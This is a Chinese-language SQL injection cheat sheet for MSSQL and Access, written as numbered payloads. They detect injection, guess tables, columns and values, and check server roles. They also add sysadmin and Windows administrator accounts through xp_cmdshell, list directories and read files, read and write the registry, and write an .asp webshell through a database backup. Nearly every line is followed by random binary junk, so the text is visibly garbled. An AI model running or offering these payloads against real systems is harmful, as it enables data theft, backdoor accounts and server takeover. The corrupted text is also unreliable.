1.判断是否有注入;and 1=1 ;and 1=2 V�A*�~R�S�
2.初步判断是否是mssql ;and user>0 :eqDE��mr>
\"B�oTi'2!
3.注入参数是字符'and [查询条件] and ''=' Vrl)[st!;I
;pu68N(�B
4.搜索时没过滤参数的'and [查询条件] and '%25'=' C=L_@{^Rgb
��=��E@wi?
5.判断数据库系统 t_��1a.Jv�
](yw2c;m�e
;and (select count(*) from sysobjects)>0 mssql �T-x1jC!B'
��i{zg{$�U
;and (select count(*) from msysobjects)>0 access BG��!;9Z{u
�'3B`�4�W,
�F/z�$�jj)
L<bZVocOb_
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Onoi��^MDy
N�Qzpgf|h�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 =qH9<,p`H�
|5|^�[v �
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ^Lga��Mmz�
�X6�s6f�u;
9.(1)猜字段的ascii值(access) =�~�Oi:�+L
"�5*n(S{ks
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 K�8�CjZpzq
`WvNN�>�R�
(2)猜字段的ascii值(mssql) |r*b�tyOJk
��%/!n]g-
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 h�Xr�`S4aJ
e6n1/�TtqM
10.测试权限结构(mssql) !l�!^�`�c�
(.Tkv��Uj`
i1RU5IRy|j
�'t"�.~H_V
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *oLA�O/)n�
{B$c�d?��}
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- gAt�[kW< n
.���),%S�}
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �EIO!f[�]o
Z���}_{@�|
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 5qo^�SiB�.
[wB-�e~���
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- OM5"&ZIZb�
C
9���I�KX
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- _%#��Q
\�D
W�b�Z�{)
i
;and 1=(select IS_MEMBER('db_owner'));-- Ezw�(J[).C
kGhWr� M�
�F#�S��^Q`
�����q�GG�
11.添加mssql和系统的帐户 �sIQd����}
0�&$+ CWSM
;exec master.dbo.sp_addlogin username;-- R=ddQ:W6g�
;exec master.dbo.sp_password null,username,password;-- P~n�I6/r�1
]e�A<�����
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- F�hw�:�@@=
P�7r?rbO�"
;exec master.dbo.xp_cmdshell 'net user username password ��(��5[|h�
�fF�!Mmm�"
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- AD$k`C��j�
R:S�Fj�!W1
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Rz�%
Px:�M
}m NP�[�L
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- � e;�8�>/G
.m_yx{F�Z=
5Gm,lNQ�Av
�A[�L+�w9�
12.(1)遍历目录 �pC,MiV$c"
�"-JJ6�B�k
;create table dirs(paths varchar(100), id int) ml�Cw(��i,
�PZ2$ [s0W
;insert dirs exec master.dbo.xp_dirtree 'c:\' �k]�FP�1\Y
b�%>�vhj&F
;and (select top 1 paths from dirs)>0 Ijq',@j��E
H|>dF)%pj
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) q)R&n�p�P7
F �XJI,(:-
�Ys,}��L�.
XE);oL2x�P
(2)遍历目录 �^���yDC�X
>QRpR�Htb
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- H?�tonG.^(
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Kd}�cf0�
J� \U}U'qP
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 S N_!o2�F2
^S!^$d�*��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 sl^i%xJ|l'
n,sl|hv2U
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �)qs�>Z?7�
zt{?Nt��b�
S)Cd1�`Gf�
$7~�k#_#PC
13.mssql中的存储过程 ws9F~LmLbr
��s�hj�b�b
xp_regenumvalues 注册表根键, 子键 l]R�O��'��
@F)51$L�d�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $/�;:X�b=q
�g[fCvWm#d
xp_regread 根键,子键,键值名 @f��442@_4
f h0��5*]r
;exec xp_regread IT&�
U%hw�
^�sIxR*C[v
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 {M:�Fsay>p
c��l4`FU�
xp_regwrite 根键,子键, 值名, 值类型, 值 dn/0>|5OF(
�n[4F\I��>
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 HU�]Yv+3 �
g2L^��cP>2
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 <)c�/�PI[j
{���U8S�l.
xp_regdeletevalue 根键,子键,值名 "3CQ���0��
QXx<H�i^ /
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 nTO,d$!K�p
4$9�WJ�~V{
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 v��!(�B�S,
kzPHPERA]�
L?!*HS7��m
F��y^��*@&
14.mssql的backup创建webshell
x,��YC�/J
/CX_@%m}e=
use model H�RO�:U��%
Aa��t��_5p
create table cmd(str image); =*0<.Lo':�
[ L% ��-lJ
insert into cmd(str) values (''); V��9Bi2\s*
]S+NH��[g+
backup database model to disk='c:\l.asp'; >�?s[g)np
���4UD�7!
8�2#7�TX4�
:lz@G�4�=C
15.mssql内置函数 �KP"
l�z�
�(�Qm��pz
;and (select @@version)>0 获得Windows的版本号 ju#/ {V;D
e�m`z=JGG�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 9:zW$Gt�&
|x*~PX��b�
;and (select user_name())>0 爆当前系统的连接用户 c�6gRXp'ID
1HYrJb,d�
;and (select db_name())>0 得到当前连接的数据库 :f (UZmV$�
AcV 2l��
'�Ba Ba=
$/</J�]2`;
16.简洁的webshell FbB^$� ]*�
����9[}L=n
use model [#$:��X+lw
�n�'a=��@/
create table cmd(str image); J�K:�i��-�
L�qy��]bnY
insert into cmd(str) values (''); $ )�q?z.U�
T+p�?VngF�
backup database model to disk='g:\wwwtest\l.asp';
